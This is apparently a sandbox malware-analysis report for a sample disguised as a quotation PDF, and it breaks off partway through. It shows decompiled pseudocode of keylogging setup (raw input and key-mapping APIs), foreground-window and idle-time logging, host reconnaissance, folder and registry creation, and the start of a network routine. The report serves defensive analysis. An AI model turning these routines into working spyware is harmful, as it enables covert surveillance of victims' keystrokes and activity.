Part of subcall function 0042211F: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0042214C
Part of subcall function 0042211F: GetFileSize.KERNEL32(000000FF,00000000), ref: 00422166
Part of subcall function 0042211F: ReadFile.KERNEL32(?,!AB,?,00000000,00000000), ref: 00422186
Part of subcall function 0042211F: FindCloseChangeNotification.KERNEL32(?), ref: 0042219E

Part of subcall function 0041E63C: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 0041E64D
Part of subcall function 0041E63C: __aulldiv.LIBCMT ref: 0041E66C
Part of subcall function 0041E63C: __aulldiv.LIBCMT ref: 0041E67A

Part of subcall function 0041E9A4: GetCurrentProcess.KERNEL32(%windir%\System32,%ProgramFiles%,TermService), ref: 0041E9AA

Part of subcall function 0041E932: GetCurrentProcess.KERNEL32(00000008,00000000,00404873,?,dBB), ref: 0041E946
Part of subcall function 0041E932: OpenProcessToken.ADVAPI32(00000000,?,dBB), ref: 0041E94D
Part of subcall function 0041E932: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000004,00000004,00000004), ref: 0041E96D
Part of subcall function 0041E932: FindCloseChangeNotification.KERNEL32(00000000,?,dBB), ref: 0041E986

Part of subcall function 0041E681: LoadLibraryA.KERNEL32(ntdll.dll), ref: 0041E699
Part of subcall function 0041E681: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0041E6B0

Part of subcall function 00406F64: lstrlenW.KERNEL32( B,00003000,00000000,?,004220E3,?), ref: 00406F73
Part of subcall function 00406F64: lstrlenW.KERNEL32(0000000A,004220E3,?), ref: 00406F8D
Part of subcall function 00406F64: lstrcpyW.KERNEL32 ref: 00406FAF

Part of subcall function 0041EAAC: GetComputerNameW.KERNEL32 ref: 0041EACC

SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,00000000), ref: 004062E1
lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 004062F3
CreateDirectoryW.KERNEL32(?,00000000,?,00000000), ref: 00406302

Part of subcall function 00413FD7: GetModuleHandleA.KERNEL32(00000000), ref: 0041401E

Strings

\Microsoft Vision\, xrefs: 004062E7

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: File$Process$ChangeCloseCreateCurrentFindInitializeModuleNameNotificationToken__aulldivlstrlen$AddressComputerDirectoryFolderGlobalHandleInformationLibraryLoadMemoryOpenPathProcReadSecuritySizeStatuslstrcatlstrcpy
String ID: \Microsoft Vision\
API String ID: 1302760014-1618823865
Opcode ID: 573175e0588cd4baf43109e340af159713c0d37e8eb7023f8c3dbcfb2887c126
Instruction ID: 68d17faba92ca3383dcf9904ed6cd9760a212999d7e146cc1e7290d9d9b59a24
Opcode Fuzzy Hash: 573175e0588cd4baf43109e340af159713c0d37e8eb7023f8c3dbcfb2887c126
Instruction Fuzzy Hash: EF413BB1900218ABDF14FBE2EC46EED77B9AF08304F40406EF605B61D1DB796A44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004140A5 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 54
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E004140A5(intOrPtr __ecx, void* __eflags) {
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				intOrPtr _t32;
				intOrPtr _t34;
				void* _t58;

				_t58 = __eflags;
				_push(__ecx);
				_push(__ecx);
				_v8 = __ecx;
				E00406F52(_v8 + 0xc);
				E00402A18(_v8 + 0xa18);
				E0041F314(_v8 + 0xa28);
				E0041F24C(_v8 + 0xa54, _t58); // executed
				E00403BE6(_v8 + 0xa6c);
				E00403BE6(_v8 + 0xa74);
				 *(_v8 + 0xa40) =  *(_v8 + 0xa40) & 0x00000000;
				_t32 = _v8;
				_t12 = _t32 + 0xa50;
				 *(_t32 + 0xa50) =  *(_t32 + 0xa50) & 0x00000000;
				_v12 = LoadLibraryW(L"User32.dll");
				_t34 = E0041FF80(_v8 + 0xa74,  *_t12, _v12, "GetRawInputData", 0); // executed
				 *((intOrPtr*)(_v8 + 0xa44)) = _t34;
				 *((intOrPtr*)(_v8 + 0xa4c)) = E0041FF80(_v8,  *_t12, _v12, "ToUnicode", 0);
				 *((intOrPtr*)(_v8 + 0xa48)) = E0041FF80(_v8,  *_t12, _v12, "MapVirtualKeyA", 0);
				return _v8;
			}

0x004140a5
0x004140a8
0x004140a9
0x004140aa
0x004140b3
0x004140c1
0x004140cf
0x004140dd
0x004140eb
0x004140f9
0x00414101
0x00414108
0x0041410b
0x0041410b
0x0041411d
0x0041412a
0x00414135
0x00414150
0x0041416b
0x00414175

APIs

Part of subcall function 0041F314: InitializeCriticalSection.KERNEL32(?,?,?,004140D4,00560720,00560720,?,004013D7), ref: 0041F31E

LoadLibraryW.KERNEL32(User32.dll), ref: 00414117

Part of subcall function 0041FF80: lstrcmpA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,0041E2D2,00000000), ref: 0041FFE1

Strings

ToUnicode, xrefs: 0041413D
User32.dll, xrefs: 00414112
GetRawInputData, xrefs: 00414122
MapVirtualKeyA, xrefs: 00414158

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CriticalInitializeLibraryLoadSectionlstrcmp
String ID: GetRawInputData$MapVirtualKeyA$ToUnicode$User32.dll
API String ID: 4274177235-2474467583
Opcode ID: 009f276d4e71ecc07abb1a3b363a8aeeec44e29cf31df5d43857fcd0063b644c
Instruction ID: b1c02d10e924ccc961c719c3b311c8fae335e329c9dce6da17753056b2ff39f0
Opcode Fuzzy Hash: 009f276d4e71ecc07abb1a3b363a8aeeec44e29cf31df5d43857fcd0063b644c
Instruction Fuzzy Hash: A711FC34B40208EBDB04EB95D952BAC7771EF45308F6400BEE5096B282DAB92F119B0A

Uniqueness

Uniqueness Score: -1.00%

Function 0041E63C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041E63C(void* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct _MEMORYSTATUSEX _v76;
				void* _t14;

				_t14 = __edx;
				_v76.dwLength = 0x40;
				GlobalMemoryStatusEx( &_v76); // executed
				_v12 = _v76.ullTotalPhys;
				_v8 = _v76.ullAvailPhys;
				return E00401190(E00401190(_v12, _v8, 0x400, 0), _t14, 0x400, 0);
			}

0x0041e63c
0x0041e642
0x0041e64d
0x0041e659
0x0041e65c
0x0041e680

APIs

GlobalMemoryStatusEx.KERNEL32(00000040), ref: 0041E64D
__aulldiv.LIBCMT ref: 0041E66C
__aulldiv.LIBCMT ref: 0041E67A

Strings

@, xrefs: 0041E642

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: __aulldiv$GlobalMemoryStatus
String ID: @
API String ID: 2185283323-2766056989
Opcode ID: 496d881d591a28fc35f85c7daf369a20c985da66fedb08a9f622a56e0f78cca7
Instruction ID: 0bc80f35c1135779502225cc82c55b3b8880bfee4a1316f6eb22b3ce1c4bfd34
Opcode Fuzzy Hash: 496d881d591a28fc35f85c7daf369a20c985da66fedb08a9f622a56e0f78cca7
Instruction Fuzzy Hash: 96E07DB4D40308BBDB14DB94CC46B9DBA78AB48744F504059F700762D1D6B469519B18

Uniqueness

Uniqueness Score: -1.00%

Function 0040B556 Relevance: 6.1, APIs: 4, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				CHAR* _v8;
				signed int _v12;
				int _v16;
				struct _STARTUPINFOA _v84;
				int _t43;
				signed int _t59;
				void* _t66;

				_v8 = GetCommandLineA();
				if( *_v8 != 0x22) {
					while(1) {
						__eflags =  *_v8 - 0x20;
						if( *_v8 <= 0x20) {
							goto L10;
						}
						_v8 =  &(_v8[1]);
					}
					while(1) {
						L10:
						__eflags =  *_v8;
						if( *_v8 == 0) {
							break;
						}
						__eflags =  *_v8 - 0x20;
						if( *_v8 > 0x20) {
							break;
						}
						_v8 =  &(_v8[1]);
					}
					_v84.dwFlags = _v84.dwFlags & 0x00000000;
					GetStartupInfoA( &_v84);
					E0040B640();
					E0040B68D(0x42c000, 0x42c030); // executed
					__eflags = _v84.dwFlags & 0x00000001;
					if(__eflags == 0) {
						_v12 = 0xa;
					} else {
						_v12 = _v84.wShowWindow & 0x0000ffff;
					}
					_t43 = E004240BA(_t66, __eflags, GetModuleHandleA(0), 0, _v8, _v12); // executed
					_v16 = _t43;
					E0040B663();
					ExitProcess(_v16);
				}
				_v8 =  &(_v8[1]);
				while( *_v8 != 0 &&  *_v8 != 0x22) {
					_v8 =  &(_v8[1]);
				}
				__eflags =  *_v8 - 0x22;
				if( *_v8 == 0x22) {
					_t59 =  &(_v8[1]);
					__eflags = _t59;
					_v8 = _t59;
				}
				goto L10;
			}

0x0040b562
0x0040b56e
0x0040b5a9
0x0040b5af
0x0040b5b2
0x00000000
0x00000000
0x0040b5b8
0x0040b5b8
0x0040b5bd
0x0040b5bd
0x0040b5c3
0x0040b5c5
0x00000000
0x00000000
0x0040b5cd
0x0040b5d0
0x00000000
0x00000000
0x0040b5d6
0x0040b5d6
0x0040b5db
0x0040b5e3
0x0040b5e9
0x0040b5f8
0x0040b602
0x0040b605
0x0040b610
0x0040b607
0x0040b60b
0x0040b60b
0x0040b628
0x0040b62d
0x0040b630
0x0040b638
0x0040b638
0x0040b574
0x0040b577
0x0040b590
0x0040b590
0x0040b59b
0x0040b59e
0x0040b5a3
0x0040b5a3
0x0040b5a4
0x0040b5a4
0x00000000

APIs

GetCommandLineA.KERNEL32 ref: 0040B55C
GetStartupInfoA.KERNEL32(?), ref: 0040B5E3
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040B621
ExitProcess.KERNEL32 ref: 0040B638

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CommandExitHandleInfoLineModuleProcessStartup
String ID:
API String ID: 2164999147-0
Opcode ID: 7311a41577a84aba55890a55cb3aa01996e7233dfadcf22bf2d265161c720c23
Instruction ID: 8daa44c93dfa01af410a5f2ebb2ac312fb16fe23185f4fda8152f77b2cf1762d
Opcode Fuzzy Hash: 7311a41577a84aba55890a55cb3aa01996e7233dfadcf22bf2d265161c720c23
Instruction Fuzzy Hash: CC31F831A04658EECB11CBA4D980AADBBF5EB09305F6404E6E411F7291D738DF41AB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00408D12 Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00408D12(intOrPtr __ecx, intOrPtr _a4) {
				char _v8;
				long _v12;
				struct HWND__* _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				struct tagLASTINPUTINFO _v40;
				intOrPtr _v44;
				char _v68;
				short _v580;
				struct HWND__* _t36;

				_v44 = __ecx;
				_v40.cbSize = 8;
				GetLastInputInfo( &_v40);
				_v12 = GetTickCount();
				_t34 = _v12 - _v40.dwTime;
				_v20 = (_v12 - _v40.dwTime) / 0x3e8;
				_t36 = GetForegroundWindow(); // executed
				_v16 = _t36;
				GetWindowTextW(_v16,  &_v580, 0x100);
				E00406F64( &_v8,  &_v580); // executed
				_v24 = E004071BE( &_v68, _t34 % 0x3e8, 0x15);
				_v28 = E00407144(_v24, _v20);
				_v32 = E00407167(_v28,  &_v8);
				E00407088(_v32, _t34 % 0x3e8, _a4);
				E00407069( &_v68, _t34 % 0x3e8);
				E00406BE2(); // executed
				return _a4;
			}

0x00408d1b
0x00408d1e
0x00408d29
0x00408d35
0x00408d3b
0x00408d47
0x00408d4a
0x00408d50
0x00408d62
0x00408d72
0x00408d81
0x00408d8f
0x00408d9e
0x00408da7
0x00408daf
0x00408db7
0x00408dc0

APIs

GetLastInputInfo.USER32 ref: 00408D29
GetTickCount.KERNEL32 ref: 00408D2F
GetForegroundWindow.USER32 ref: 00408D4A
GetWindowTextW.USER32 ref: 00408D62

Part of subcall function 00406F64: lstrlenW.KERNEL32( B,00003000,00000000,?,004220E3,?), ref: 00406F73
Part of subcall function 00406F64: lstrlenW.KERNEL32(0000000A,004220E3,?), ref: 00406F8D
Part of subcall function 00406F64: lstrcpyW.KERNEL32 ref: 00406FAF

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Windowlstrlen$CountForegroundInfoInputLastTextTicklstrcpy
String ID:
API String ID: 3376147844-0
Opcode ID: c58ac460a8e2ea65ffbe1d38b014d94d426b03089653d029bfd98cc42b7463f3
Instruction ID: 986d1d1d7d46b3ba858f5e4ff5e6126c80b2df37eecf7e0d2ba2fafacc24b3bf
Opcode Fuzzy Hash: c58ac460a8e2ea65ffbe1d38b014d94d426b03089653d029bfd98cc42b7463f3
Instruction Fuzzy Hash: 1F11C670D00209DFCB04EFA5DC859EDBBB5FF08304F50407AE505B6290DB346A45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041E932 Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041E932() {
				void* _v8;
				void _v12;
				signed int _v16;
				long _v20;
				void _v24;
				int _t26;

				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
					_v20 = 4;
					_t26 = GetTokenInformation(_v8, 0x14,  &_v24, 4,  &_v20); // executed
					if(_t26 != 0) {
						_v12 = _v24;
					}
				}
				if(_v8 != 0) {
					FindCloseChangeNotification(_v8); // executed
				}
				if(_v12 == 0) {
					_v16 = _v16 & 0x00000000;
				} else {
					_v16 = 1;
				}
				return _v16;
			}

0x0041e938
0x0041e93c
0x0041e955
0x0041e957
0x0041e96d
0x0041e975
0x0041e97a
0x0041e97a
0x0041e975
0x0041e981
0x0041e986
0x0041e986
0x0041e990
0x0041e99b
0x0041e992
0x0041e992
0x0041e992
0x0041e9a3

APIs

GetCurrentProcess.KERNEL32(00000008,00000000,00404873,?,dBB), ref: 0041E946
OpenProcessToken.ADVAPI32(00000000,?,dBB), ref: 0041E94D
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000004,00000004,00000004), ref: 0041E96D
FindCloseChangeNotification.KERNEL32(00000000,?,dBB), ref: 0041E986

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: ProcessToken$ChangeCloseCurrentFindInformationNotificationOpen
String ID:
API String ID: 2406157124-0
Opcode ID: 97e1d00dc3ece647c14960b4e8def48b3b99fbcb85e38cccb3dc824c3ec677b5
Instruction ID: 2d64c73652834ba621cc749677a54e6f5bb980a9289913285bd4cc1d2fe4e628
Opcode Fuzzy Hash: 97e1d00dc3ece647c14960b4e8def48b3b99fbcb85e38cccb3dc824c3ec677b5
Instruction Fuzzy Hash: 000144B1D1020DEFDB10DF91C848BEEBBB8BF00305F504065E611A61A0D7788B49DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00406F64 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00406F64(WCHAR** __ecx, WCHAR* _a4) {
				WCHAR** _v8;
				WCHAR* _t15;

				_t23 = __ecx;
				_push(__ecx);
				_v8 = __ecx;
				_t2 =  &_a4; // 0x4220e3
				_t15 = E0040B727(_t23, lstrlenW( *_t2) + _t13 + 2, 0x3000); // executed
				 *_v8 = _t15;
				E0040132F( *_v8, 0, lstrlenW(_a4) + _t16 + 2);
				lstrcpyW( *_v8, _a4);
				return _v8;
			}

0x00406f64
0x00406f67
0x00406f68
0x00406f70
0x00406f7e
0x00406f88
0x00406f9f
0x00406faf
0x00406fb9

APIs

lstrlenW.KERNEL32( B,00003000,00000000,?,004220E3,?), ref: 00406F73

Part of subcall function 0040B727: VirtualAlloc.KERNEL32(00000000,?,0040B08C,00000004,?,?,?,00406B80,00000000,?,0040B08C,.bss,?), ref: 0040B736
Part of subcall function 0040B727: GetLastError.KERNEL32(?,?,?,00406B80,00000000,?,0040B08C,.bss), ref: 0040B745

lstrlenW.KERNEL32(0000000A,004220E3,?), ref: 00406F8D
lstrcpyW.KERNEL32 ref: 00406FAF

Strings

B, xrefs: 00406F70

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocErrorLastVirtuallstrcpy
String ID: B
API String ID: 3653792215-3915878530
Opcode ID: 762b47a49b33acf0c0304b88021997ebc744fdc8d501dd46f38a0fd0e76ea66a
Instruction ID: d64d221bfe89c351de346373f732559a6f6c2ee8b53c94071b42567f10248f45
Opcode Fuzzy Hash: 762b47a49b33acf0c0304b88021997ebc744fdc8d501dd46f38a0fd0e76ea66a
Instruction Fuzzy Hash: 78F01775600108FFDB05DF90DC4AD6D7BB9EB08348B114069F9059B261DB32AF21EB58

Uniqueness

Uniqueness Score: -1.00%

Function 0042080B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042080B(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				int _v12;
				char* _v16;
				intOrPtr* _v20;
				int _v24;
				short* _v28;
				void* _v32;
				short* _v36;
				void* _v40;
				long _t41;
				long _t49;

				_v20 = __ecx;
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v28 = E00406F44(_a4);
				_v32 =  *_v20;
				_t41 = RegQueryValueExW(_v32, _v28, 0,  &_v24, 0,  &_v12); // executed
				_v8 = _t41;
				if(_v8 != 0) {
					L5:
					return 0;
				}
				_v16 = E00401000(_v12);
				_v36 = E00406F44(_a4);
				_v40 =  *_v20;
				_t49 = RegQueryValueExW(_v40, _v36, 0,  &_v24, _v16,  &_v12); // executed
				_v8 = _t49;
				if(_v8 != 0) {
					goto L5;
				}
				E00406598(_a8, _v16, _v12);
				if(_v16 != 0) {
					E00401014(_v16);
				}
				return 1;
			}

0x00420811
0x00420814
0x00420818
0x0042081c
0x00420828
0x00420830
0x00420845
0x0042084b
0x00420852
0x004208b7
0x00000000
0x004208b7
0x0042085d
0x00420868
0x00420870
0x00420886
0x0042088c
0x00420893
0x00000000
0x00000000
0x0042089e
0x004208a7
0x004208ac
0x004208b1
0x00000000

APIs

RegQueryValueExW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,InitWindows,00000000,inst), ref: 00420845

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,02800000,0042212F,02800000,?,?,00424121,?,00000000), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00424121,?,00000000), ref: 0040100D

RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00420886

Part of subcall function 00401014: GetProcessHeap.KERNEL32(00000000,?,004220FC,?,00000000,?), ref: 0040101A
Part of subcall function 00401014: HeapFree.KERNEL32(00000000), ref: 00401021

Strings

dBB, xrefs: 0042080B

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Heap$ProcessQueryValue$AllocateFree
String ID: dBB
API String ID: 3459632794-3926046677
Opcode ID: 5ca8f33ed601e5912969a078769b2071f3cf68b2a7f00cac1f62bd9bd39cb158
Instruction ID: 2fd47bceb675c01c74d3ddfcda420530ab5d14c63396651ff9093659d515a103
Opcode Fuzzy Hash: 5ca8f33ed601e5912969a078769b2071f3cf68b2a7f00cac1f62bd9bd39cb158
Instruction Fuzzy Hash: E321C271D00209EFDF01EFA4D845BEEBBB5FB08305F10806AE512B62A1D7395A94DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00420997 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420997(void** __ecx, void* _a4, intOrPtr _a8, int _a12, intOrPtr _a16) {
				long _v8;
				void** _v12;
				int _v16;
				long _t24;

				_v12 = __ecx;
				_v8 = _v8 & 0x00000000;
				if(_a16 == 0 || E0041E249(__ecx, _a4, _a8) != 0) {
					L5:
					_t24 = RegOpenKeyExW(_a4, E00406F44(_a8), 0, _a12, _v12); // executed
					_v8 = _t24;
					if(_v8 != 0) {
						return 0;
					}
					return 1;
				} else {
					_v16 = _v16 & 0x00000000;
					_v8 = RegCreateKeyExW(_a4, E00406F44(_a8), 0, 0, 0, _a12, 0, _v12,  &_v16);
					if(_v8 == 0) {
						E004207E9(_v12);
						goto L5;
					}
					return 0;
				}
			}

0x0042099d
0x004209a0
0x004209a8
0x004209f8
0x00420a0c
0x00420a12
0x00420a19
0x00000000
0x00420a20
0x00000000
0x004209bb
0x004209bb
0x004209e3
0x004209ea
0x004209f3
0x00000000
0x004209f3
0x00000000
0x004209ec

APIs

RegOpenKeyExW.KERNEL32(?,00000000,00000000,?,?), ref: 00420A0C

Part of subcall function 0041E249: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,004209B5,?,00000000), ref: 0041E269

RegCreateKeyExW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000000,?,00000000), ref: 004209DD

Strings

dBB, xrefs: 00420997

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Open$Create
String ID: dBB
API String ID: 161609438-3926046677
Opcode ID: 3e026f5096cc8aebd119fbd9dcec0f9b80173367416b30e4b1df000e06a7de45
Instruction ID: 4b9fe46a4829daaad6a1d56fffbdfaf81decc69abbd3ad7f6959edfadc6a2c49
Opcode Fuzzy Hash: 3e026f5096cc8aebd119fbd9dcec0f9b80173367416b30e4b1df000e06a7de45
Instruction Fuzzy Hash: F0118231A00209FFEF10DF60EC05BEE7BB4EB04305F50807AF902A6192D7799A50EB48

Uniqueness

Uniqueness Score: -1.00%

Function 00420768 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420768(void** __ecx, void* _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
				signed int _v8;
				signed int _v12;
				int _v16;
				void** _v20;
				signed int _v24;
				long _t24;
				void* _t28;

				_v20 = __ecx;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				if(_a12 == 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_v8 = 1;
				}
				_v24 = _v8;
				_t14 =  &_a16; // 0x420aee
				_t15 =  &_v24; // 0x420aee
				_t24 = RegCreateKeyExW(_a4, E00406F44(_a8), 0, 0,  *_t15,  *_t14, 0, _v20,  &_v16); // executed
				_v12 = _t24;
				if(_v12 != 0) {
					return 0;
				} else {
					if(_v16 != 1) {
						return 1;
					}
					_t28 = 2;
					return _t28;
				}
			}

0x0042076e
0x00420771
0x00420775
0x0042077d
0x00420788
0x0042077f
0x0042077f
0x0042077f
0x0042078f
0x0042079b
0x0042079e
0x004207b1
0x004207b7
0x004207be
0x00000000
0x004207c0
0x004207c4
0x00000000
0x004207cf
0x004207c8
0x00000000
0x004207c8

APIs

RegCreateKeyExW.KERNEL32(0000000A,00000000,00000000,00000000,?,B,00000000,00000000,00000000,00420AEE), ref: 004207B1

Strings

B, xrefs: 0042079B
B, xrefs: 0042079E

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Create
String ID: B$B
API String ID: 2289755597-2279310844
Opcode ID: 1bb532e38d691f6fe2a964c0daf514e5f7eeda722f26f4e0b2bf40ae1834d197
Instruction ID: b79fcb33c9fd0f38c5e97f04fc69ccfca0e816163214f1e031566b7ba5f0572e
Opcode Fuzzy Hash: 1bb532e38d691f6fe2a964c0daf514e5f7eeda722f26f4e0b2bf40ae1834d197
Instruction Fuzzy Hash: 15012C71E04219FFDF10DF90D805BAEB7F4EB04315F60846AE502B6181C3B99A55EF55

Uniqueness

Uniqueness Score: -1.00%

Function 00406B58 Relevance: 3.8, APIs: 3, Instructions: 24
stringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00406B58(CHAR** __ecx, CHAR* _a4) {
				CHAR** _v8;
				CHAR* _t11;

				_t14 = __ecx;
				_push(__ecx);
				_v8 = __ecx;
				if(lstrlenA(_a4) > 0) {
					_t11 = E0040B727(_t14, lstrlenA(_a4), 0x3000); // executed
					 *_v8 = _t11;
					lstrcpyA( *_v8, _a4);
				}
				return _v8;
			}

0x00406b58
0x00406b5b
0x00406b5c
0x00406b6a
0x00406b7b
0x00406b85
0x00406b8f
0x00406b8f
0x00406b99

APIs

lstrlenA.KERNEL32(?,?,?,0040B08C,.bss,?), ref: 00406B62
lstrlenA.KERNEL32(?,00003000,?,0040B08C,.bss,?), ref: 00406B74

Part of subcall function 0040B727: VirtualAlloc.KERNEL32(00000000,?,0040B08C,00000004,?,?,?,00406B80,00000000,?,0040B08C,.bss,?), ref: 0040B736
Part of subcall function 0040B727: GetLastError.KERNEL32(?,?,?,00406B80,00000000,?,0040B08C,.bss), ref: 0040B745

lstrcpyA.KERNEL32(?,?,0040B08C,.bss,?), ref: 00406B8F

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocErrorLastVirtuallstrcpy
String ID:
API String ID: 3653792215-0
Opcode ID: e70e385f4162c01395d78d4c0c254122433d5e7421456d17bf9741e299a4b28c
Instruction ID: 368729eac0c4f55e9e5ad2ce0cc2874848318bd870b48c33ebf83c5ee83ec356
Opcode Fuzzy Hash: e70e385f4162c01395d78d4c0c254122433d5e7421456d17bf9741e299a4b28c
Instruction Fuzzy Hash: 64E03971600208FFDB159F64ED0A96D7BB8EB04344B200069F909A6261DB31BE219B48

Uniqueness

Uniqueness Score: -1.00%

Function 0040A957 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040A957(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v44;
				char _v52;
				void* _t32;
				intOrPtr _t43;
				void* _t63;

				_v8 = __ecx;
				if( *((intOrPtr*)(_v8 + 0xc)) != 0xffffffff) {
					_t32 = E00406B58( &_v12, "nevergonnagiveyouup"); // executed
					E00406651( &_v52, _t32);
					E00406B06(); // executed
					E004066FC(_t63, _a4);
